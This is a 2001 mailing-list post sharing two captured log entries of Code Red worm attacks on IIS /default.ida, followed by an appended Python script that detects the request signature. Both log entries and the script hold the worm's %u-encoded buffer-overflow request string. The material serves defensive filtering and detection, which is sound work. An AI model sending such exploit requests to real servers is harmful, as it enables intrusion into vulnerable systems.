Captured Code Red IIS Hack Attempts

Williams, Bob WilliamsRB at mail.vmi.edu
Wed Aug 1 16:33:19 GMT 2001


Folks,

FYI - Here are the log files of two attempted Code Red worm attacks picked
up this morning by one of our security servers.  One was from a host on the
ISP Shaw Fiberlink in Alberta, CA, the other from a host on the Korea Radio
Promotion Association network in Seoul.  Both attempts use the same code
sequence following the NNNNNNNNNs, so this information may be useful in
defining Code Red firewall, router etc. filters.  Time/date information is
EDT.

Bob Williams
UNIX/Network Security Administrator
Virginia Military Institute
Information Technology
427 Nichols Engineering Annex
Lexington, VA 24450

540-464-7758

______________________________________________________________
Log: 
Client connecting: 211.252.60.3
<---GET
/default.ida?NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNN%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%
u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a
HTTP/1.0
<---Content-type: text/xm
<---HOST:www.worm.co
<--- Accept: */
<---Content-length: 3569 
--->HTTP/1.1 404 Not Found
--->Date: Wed Aug 01 11:04:34 2001
--->Server: Apache/1.3.9 (Unix)
--->Connection: close
--->Content-Type: text/html
---><HTML><HEAD><TITLE>Error 404</TITLE></HEAD><BODY><P><H1>404: Document
Not Found</H1></P></BODY></HTML>
Closing connection with 211.252.60.3
_____________________________________________________________________
Log: 
Client connecting: 24.77.251.188
<---GET
/default.ida?NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNN%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%
u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a
HTTP/1.0
<---Content-type: text/xm
<---HOST:www.worm.co
<--- Accept: */
<---Content-length: 3569 
--->HTTP/1.1 404 Not Found
--->Date: Wed Aug 01 08:43:43 2001
--->Server: Apache/1.3.9 (Unix)
--->Connection: close
--->Content-Type: text/html
---><HTML><HEAD><TITLE>Error 404</TITLE></HEAD><BODY><P><H1>404: Document
Not Found</H1></P></BODY></HTML>
Closing connection with 24.77.251.188
_______________________________________________________
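As an added example (not part of Bob Williams's message or of any VMI tool): a small Python filter that walks a connection transcript in the same "<---"/"--->" style as the two captures above and flags GET requests for /default.ida whose query carries the %u-escape sequence that follows the run of Ns in both captures. The transcript it scans is constructed here from the captured request; the filler length (224) and the 64-repeat threshold are assumptions, and the filler check is generalised to any long run of one repeated letter rather than Ns only.

```python
import re

# The unicode-escape sequence that immediately follows the filler in both
# captured requests above; used as the signature of this worm variant.
CODE_RED_MARKER = "%u9090%u6858%ucbd3%u7801"

# Tail of the captured request, copied verbatim from the logs above.
CAPTURED_TAIL = (
    "%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%"
    "u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a"
)

# Constructed transcript in the same "<---"/"--->" style as the captures
# (client-to-server lines start with "<---"). The worm request is rebuilt as a
# single line (the capture wraps it); 224 Ns is an assumed filler length.
# The second session (192.0.2.10, a documentation address) is a benign request
# added for contrast.
SAMPLE_LOG = (
    "Client connecting: 211.252.60.3\n"
    "<---GET /default.ida?" + "N" * 224 + CAPTURED_TAIL + " HTTP/1.0\n"
    "<---Content-length: 3569\n"
    "--->HTTP/1.1 404 Not Found\n"
    "Closing connection with 211.252.60.3\n"
    "Client connecting: 192.0.2.10\n"
    "<---GET /index.html HTTP/1.0\n"
    "<---Host: www.example.edu\n"
    "--->HTTP/1.1 200 OK\n"
    "Closing connection with 192.0.2.10\n"
)

REQUEST_LINE = re.compile(r"^(?P<method>[A-Z]+) (?P<target>\S+) HTTP/(?P<version>\d\.\d)$")
# At least 64 repeats of one letter at the start of the query string
# (assumed threshold; the captures show a far longer run of N).
FILLER_RUN = re.compile(r"^([A-Za-z])\1{63,}")


def classify_request(request_line: str) -> str:
    """Classify one HTTP request line.

    Returns "code-red" when the request targets /default.ida with a long filler
    run followed by the captured %u sequence, "ida-suspicious" for /default.ida
    requests that show only part of that pattern or other %u escapes,
    "benign" for everything else, and "malformed" if the line does not parse.
    """
    m = REQUEST_LINE.match(request_line.strip())
    if not m:
        return "malformed"
    path, _, query = m.group("target").partition("?")
    if path.lower() != "/default.ida":
        return "benign"
    has_filler = FILLER_RUN.match(query) is not None
    has_marker = CODE_RED_MARKER in query
    if has_filler and has_marker:
        return "code-red"
    if has_filler or has_marker or "%u" in query.lower():
        return "ida-suspicious"
    return "benign"


def scan_transcript(text: str) -> list[dict]:
    """Walk a '<---'/'--->' transcript and return one record per client request.

    Each record holds the client address announced by the preceding
    "Client connecting:" line, the request line, and its verdict.
    """
    results = []
    client = None
    for raw in text.splitlines():
        line = raw.strip()
        if line.startswith("Client connecting:"):
            client = line.split(":", 1)[1].strip()
        elif line.startswith("<---"):
            payload = line[4:].strip()          # tolerate "<--- Accept: ..." spacing
            if REQUEST_LINE.match(payload):
                results.append({
                    "client": client,
                    "request": payload,
                    "verdict": classify_request(payload),
                })
    return results


if __name__ == "__main__":
    for hit in scan_transcript(SAMPLE_LOG):
        print(f"{hit['client']:15} {hit['verdict']:15} {hit['request'][:60]}...")
```

The marker alone is the useful part for a router or proxy filter: the filler length can vary between variants, but the first %u escapes after it are fixed in both captures, so matching on that short string in the request URI gives a stable rule with few false positives.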